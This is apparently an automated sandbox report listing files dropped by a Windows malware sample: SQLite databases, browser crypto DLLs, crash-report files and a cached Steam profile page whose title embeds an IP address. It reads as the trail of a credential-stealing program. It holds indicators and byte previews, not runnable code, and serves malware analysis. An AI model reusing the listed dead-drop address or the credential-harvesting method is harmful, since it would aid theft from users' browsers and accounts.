                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\AFCBAEBAEBFH\JKKEHJ

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):98304
                                                                                        Entropy (8bit):0.08235737944063153
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\AFCBAEBAEBFH\JKKEHJ-shm

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):0.017262956703125623
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                        Malicious:false
                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\AFCBAEBAEBFH\KFHJJJ

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):126976
                                                                                        Entropy (8bit):0.47147045728725767
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\AFCBAEBAEBFH\freebl3.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):685392
                                                                                        Entropy (8bit):6.872871740790978
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: BI6oo9z4In.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: btCbrSS2Je.exe, Detection: malicious, Browse
                                                                                        • Filename: 7urUz64I0Y.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exe, Detection: malicious, Browse
                                                                                        • Filename: a6lzHWp4pa.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\AFCBAEBAEBFH\mozglue.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):608080
                                                                                        Entropy (8bit):6.833616094889818
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: BI6oo9z4In.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: btCbrSS2Je.exe, Detection: malicious, Browse
                                                                                        • Filename: 7urUz64I0Y.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exe, Detection: malicious, Browse
                                                                                        • Filename: a6lzHWp4pa.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\AFCBAEBAEBFH\msvcp140.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):450024
                                                                                        Entropy (8bit):6.673992339875127
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\AFCBAEBAEBFH\nss3.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):2046288
                                                                                        Entropy (8bit):6.787733948558952
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\AFCBAEBAEBFH\softokn3.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):257872
                                                                                        Entropy (8bit):6.727482641240852
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\AFCBAEBAEBFH\vcruntime140.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):80880
                                                                                        Entropy (8bit):6.920480786566406
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PZQ0BTUPVU0ZFE5I_8451756f91de466bdbe5221a687bc26178a06a_ac844944_5fcda2fd-16a2-440e-898a-8104453ba001\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.066159737600463
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:rp88kXkY340BU/aa6FOzuiFYZ24IO8Il:d88kXkYjBU/aaBzuiFYY4IO8Il
                                                                                        MD5:49A07728795917A93AA5A985337B0480
                                                                                        SHA1:CA48FC30A630C6BC8EFF9DAC0CD102F9EAC687C4
                                                                                        SHA-256:08CA2D44D6F9D27386B2DB062073D09FEF20698628ED97BD1043EF0FD30FED0B
                                                                                        SHA-512:E67D99DDC07714DA83366A6BA89D477854C53C9D7BAC4E962BA16F0707CB9E8A76C42978B641F41038EBA55D22E56AB79E4C0E46A9817819E0D2D38423F4A990
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.1.0.1.2.8.2.0.3.3.3.9.6.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.1.0.1.2.8.2.1.5.3.7.0.9.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.c.d.a.2.f.d.-.1.6.a.2.-.4.4.0.e.-.8.9.8.a.-.8.1.0.4.4.5.3.b.a.0.0.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.3.a.9.1.1.1.-.6.c.a.e.-.4.4.0.c.-.8.f.8.c.-.9.5.5.7.2.f.9.8.3.c.d.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.i.n.3.2...M.a.l.w.a.r.e.-.g.e.n...1.9.8...6.5.1.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.o.r.t.a.b.l.e.n.e.w.e.u.r.o.p.e._.h.u.b.8...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.b.4.-.0.0.0.1.-.0.0.1.4.-.0.5.8.c.-.5.6.2.5.b.4.a.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.f.8.4.8.7.0.0.a.d.3.a.9.5.7.3.a.8.3.7.2.1.3.d.1.6.f.9.f.e.2.6.0.0.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER74E4.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Fri May 24 08:27:00 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):220569
                                                                                        Entropy (8bit):3.561915889160963
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:+/pr4xIuBojRdpN4uE2aOhO5LTgViSVXoy2A8uf0hxOCDXtTAhZ4a8lT:+x3R4uEqheLTgwyCzN9i4H
                                                                                        MD5:0CF4D34E47FEE0FB97EE37308722874C
                                                                                        SHA1:370A32D5E588E7640D670D0D8299EED4FD7B8F51
                                                                                        SHA-256:133BE8A9AA2567599B0B0A03998DA1F589E1E1351BCF94FEB016082729780DC8
                                                                                        SHA-512:DB1D1C5AA588C865F79E8A85C6AD5687B19395975BFF672379B449244D3333910866B541D22D3218806449B17E9D86BEF98CA2FE338D90D8A5BA0D7F4238575E
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .......TOPf........................`...(.......$...............tJ..........`.......8...........T...........0+..i2.......................!..............................................................................eJ......0"......GenuineIntel............T...........SOPf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER75EF.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8520
                                                                                        Entropy (8bit):3.7038570432957667
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJYc6K6Y9vSU9y+sgmfZxU+prj89baLysfAdUzm:R6lXJT6K6YFSU9y+sgmfvUnaLxfAaq
                                                                                        MD5:F6AB8B0A2CAB1C6DCE1F202453E8A7B6
                                                                                        SHA1:1496AE207D3D7C0000FA4F7E29AF8DB75A29F474
                                                                                        SHA-256:DE6FC0E148E5291FB9B0316DF91F3FA4B1B73ADDE9BFB2B2BA407D4F9BBB8F7F
                                                                                        SHA-512:1B8C0A18EACB91DB07A7A7DB0C81ED0D6D902768EB3CED99C799D652E5EC62922F854BC1DC1D5ED3BB161A1B4DEA2134C595F2BBC369727688C8E02D148D6567
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.8.0.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER760F.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4911
                                                                                        Entropy (8bit):4.569597999494528
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zs5uJg77aI9vMWpW8VYuoYm8M4J+bF4QsFjf+q8vybF4Qtv4uX3d:uIjfyI7Nl7VjJ+pOKypdAuX3d
                                                                                        MD5:B48BBD3B14487E20904911964CE31941
                                                                                        SHA1:F6D30B992AC4F7EDC888E3C4DB78F7A45913A4D6
                                                                                        SHA-256:F4656C8EBDE285001D96B8AC10B748E131AAA536903515577B847F9DF3D0B0B2
                                                                                        SHA-512:7EB3B5BEF04453DC70640237682524D28D8C3596333C0C1A6702325A9533BA9A5A9B9DC25F4572B81B9E2AE5145CB425B0D37BE2CFB05B829CAFF47D8EE970DE
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="336929" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):522
                                                                                        Entropy (8bit):5.358731107079437
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                                                        MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                                                        SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                                                        SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                                                        SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199689717899[1].htm

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):35682
                                                                                        Entropy (8bit):5.381184679792834
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:j7pqLtWYmwt5D0gqOciNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2Sm:j78LtWYmwt5D0gqOcc7PzzgiJmDzJtxy
                                                                                        MD5:282216A64AA95276028CEEB327AEF8C0
                                                                                        SHA1:7415E650299D80FEC055F870FC3B9D9D93AA5376
                                                                                        SHA-256:E06A684F09A37740DDF459699B254332FBAFC7D13182D434BB4642BE63549A01
                                                                                        SHA-512:9A1DA25B0866FF28CEC347AA1B4E30CB5614E6CF02EE3559469483918DFE630A2E2A4B66694F98B2929394EA54F6C7AF763B73C7B14F1937118E2CAE66198136
                                                                                        Malicious:false
                                                                                        Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://78.47.123.174|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.cs

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):2459136
                                                                                        Entropy (8bit):6.052474106868353
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                        MD5:90E744829865D57082A7F452EDC90DE5
                                                                                        SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                        SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                        SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

